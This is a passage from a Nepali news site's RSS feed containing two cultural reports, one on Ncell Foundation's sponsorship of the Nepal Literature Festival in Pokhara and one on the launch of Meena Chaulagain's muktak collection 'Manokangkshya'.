एनसेलकी इन्टेरिम मार्केटिङ, कम्युनिकेसन एन्ड सस्टेनेबिलिटी डाइरेक्टर विशाखालक्ष्मी खड्काले सञ्चारको क्षेत्रबाट मात्र नभई कला र साहित्यबाट पनि आफूहरू समाजसँग जोडिएको बताइन् । कला–संस्कृति र साहित्य समाजको धरोहर भएको र एनसेल फाउन्डेसनमार्फत फेस्टिभलसँग १० वर्षपछि फेरि आबद्ध हुन पाएकोमा उनले खुसी व्यक्त गरिन् । ‘कला, साहित्य र संस्कृति हाम्रा धरोहर हुन् । यिनको जगेर्ना गर्नु सबैको जिम्मेवारी हो । नेपाल लिटरेचर फेस्टिभलका सुरुका वर्षहरुमा हाम्रो सहयात्रा एकदमै राम्रो रह्यो । एक दशकपछि पुनः सहकार्य गर्न पाएकोमा हामी अत्यन्तै हर्षित छौं ।’ एनसेल फाउन्डेसनले सञ्चार, प्रविधि, शिक्षा, स्वास्थ्य, वातावरण, कला, संस्कृतिलगायत क्षेत्रमा २ अर्ब रूपैयाँभन्दा बढी लगानी गरेको उनले जानकारी दिइन् ।

फेस्टिभल आयोजक सदस्य एवम् पत्रकार केशवशरण लामिछानेले साहित्य र नेपाल लिटरेचर फेस्टिभलको महत्वबारे चर्चा गरे । साहित्यले समाजमा पुर्‍याएका योगदानहरूका उदाहरण दिँदै उनले भने, ‘साहित्यले सामाजिक न्यायको क्षेत्रमा, मूल्य र मान्यता भत्काउने र निर्माण गर्ने काममा सघन भूमिका खेलेको हुन्छ । सँगै यसले अल्पसङ्ख्यक, पिछडिएका वर्गलगायतको भाषा, बोली, पिँधको आवाज र रोदनलाई मूलधारको मुद्दा बनाउने काम पनि गर्छ । नेपाली समाज पनि अझ बढी सहिष्णु, सहानुभूतिपूर्ण, स्वतन्त्रतावादी र सभ्य बनोस् भन्ने हाम्रो चाहना छ । त्यही कार्यलाई टेवा पुर्‍याउन नै नेपाल लिटरेचर फेस्टिभल आयोजना गरिएको हो ।’

फेस्टिभल आयोजक सदस्य एवं पत्रकार भरत कोइरालाले इभेन्टहरूको सहर पोखरामा बर्सेनि हुँदै आएको लिटरेचर फेस्टिभलले सहरको संस्कृति र सभ्यता निर्माण थप योगदान पुर्‍याएको विश्वास व्यक्त गरे ।

फेस्टिभलको उद्‌घाटन सञ्चार तथा सूचना प्रविधि मन्त्री पृथ्वीसुब्बा गुरुङले गर्ने छन् । फेस्टिभललाई बुद्ध एयरले संवर्धन गरेको छ । पोखरा महानगरपालिका प्रवर्धक रहेको फेस्टिभलमा गण्डकी प्रदेश सरकार सहप्रवर्धक छ । त्यस्तै उप–प्रवर्धकका रूपमा नेपाल पर्यटन बोर्ड, कृषि विकास बैङ्क, ग्लोबल आइएमई बैङ्क र प्रभु बैङ्कले आयोजकलाई साथ दिएका छन् ।

]]> https://www.antaranganews.com/?feed=rss2&p=30184 0 मुक्तककार मीनाको मुक्तक सङ्ग्रह ‘मनोकाङ्क्षा’को भव्य कार्यक्रमका बीच बिमोचन https://www.antaranganews.com/?p=28287 https://www.antaranganews.com/?p=28287#respond Sat, 23 Nov 2024 16:41:39 +0000 https://www.antaranganews.com/?p=28287 काठमाडौँ– नेपाली साहित्यको मुक्तक विधामा अर्को एक कीर्ति आजबाट थपिएको छ । नेपाल प्रज्ञा प्रतिष्ठानका कुलपति भूपाल राईलगायतका अतिथिहरूले सो कीर्तिको पारिजातकक्षमा ‘मनोकाङ्क्षा’को मंसिर ८ गते लोकार्पण गर्नु भएको हो । मुक्तककार मीना चौलागाईं मनोकाङ्क्षा दोस्रो मुक्तक कीर्ति हो ।
प्रमुख अतिथि कुलपति राईले आफ्नो उदघाटन मन्तव्यमा मुक्तकले घटनाप्रधान र विषयवस्तुको प्रभावजन्य झट्का उत्पन्न गर्न सक्नुपर्ने बताउनु भयो । उहाँले मुक्तक दर्शनढुङ्गा र चकमक ठोस्दा निस्किने झिल्को जस्तै बन्न सक्नुपर्नेमा जोड दिनुभयो । राईले टिप्पणी गर्दै भन्नु भयो, ‘मुक्तककार मीना चौलागाईंका मुक्तक भावोत्पादक र सामयिक मूल्यबोध गर्न सक्षम रहेका छन् ।’
नेपाल प्रज्ञा–प्रतिष्ठानका प्राज्ञ परिषद् सदस्य तथा सामाजिक शास्त्र विभाग प्रमुख डा. कौशिला रिसालले विमोचित कीर्ति ‘मनोकाङ्क्षा’को समीक्षा गर्नु भएको थियो । उहाँले मुक्तक सङ्ग्रहमा प्रेम तथा शृङ्गारिक मनोभावना व्याप्त रहेको बताउनु भयो । कृतिकारले मुक्तकमा सुखदुःखका भोगाई, मातृप्रेम, मानवीय संवेदना, यथार्थ अनुभूति, र आरोहअवरोह चित्रण गर्न सक्षम भएको उल्लेख गर्नुभयो ।
नेपाली साहित्यमा मुक्तक कति लोकप्रिय छ भन्ने बताइरहन परोइन । छोटो, मिठो र चोटिलो विधा मुक्तकमा चौतर्फी आकर्षण बढ्दो छ ।
लोकार्पित मुक्तकसङ्ग्रहबाट पार्वती भट्ट, कार्मु चौलागाईं, प्रकाश बस्नेत गफाडी र निलाञ्जला भारद्वाजले तीन÷तीनवटा मुक्तक वाचन गरेर सुनाउनु भएको थियो ।
समारोहमा वरिष्ठ मुक्तककार ज्ञानुवकर पौडेल, नियात्राकार प्रतीक ढकाल, कवि– कलाकार रमेश पौडेल, मुक्तककार सुनिल अधिकारी, कृतिकारकी गुरु कोमल ढुङ्गेल कृतिकारकी सुपुत्री आयुश्री चौलागाईंले कृति र कृतिकारको व्यक्तित्व एवम् कीर्तित्वका बारेमा प्रकाश पार्दै शुभकामना मन्तव्य व्यक्त गुर्न भएको थियो ।
कृतिकार चौलागाईंले आफू पहिलेदेखि नै मुक्तक विधामा प्रतिबद्ध भएर लागेको स्मरण गर्नु हुँदै यो दोस्रो कृतिबाट थप जिम्मेवारी महसुस भएको जानकारी दिनुभएको थियो । सर्जक चौलागाईंले आफ्नो मुक्तक लेखनशैली र रचनागर्भका बारेमा जानकारी दिनुभएको थियोे । उहाँले मनोकाङ्क्क्षामा विभिन्न भाव र विषयका ३१२ वटा मुक्तक समेटिएको जानकारी दिँदै विमोचित कृतिबाट केही मुक्तक वाचन गर्नुभएको थियो ।
नेपाल मुक्तक प्रतिष्ठानका अध्यक्ष रामकाजी कोनेको अध्यक्षतामा महासचिव यादव भट्टराईको उद्घोषण र प्रतिष्ठानका केन्द्रीय सदस्य दिव्य गिरीको स्वागत मन्तव्य दिनु भएको थियो ।
कृतिकार चौलागाईंको यसअघि ‘मुक्तक मिनार’ प्रकाशित भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=28287 0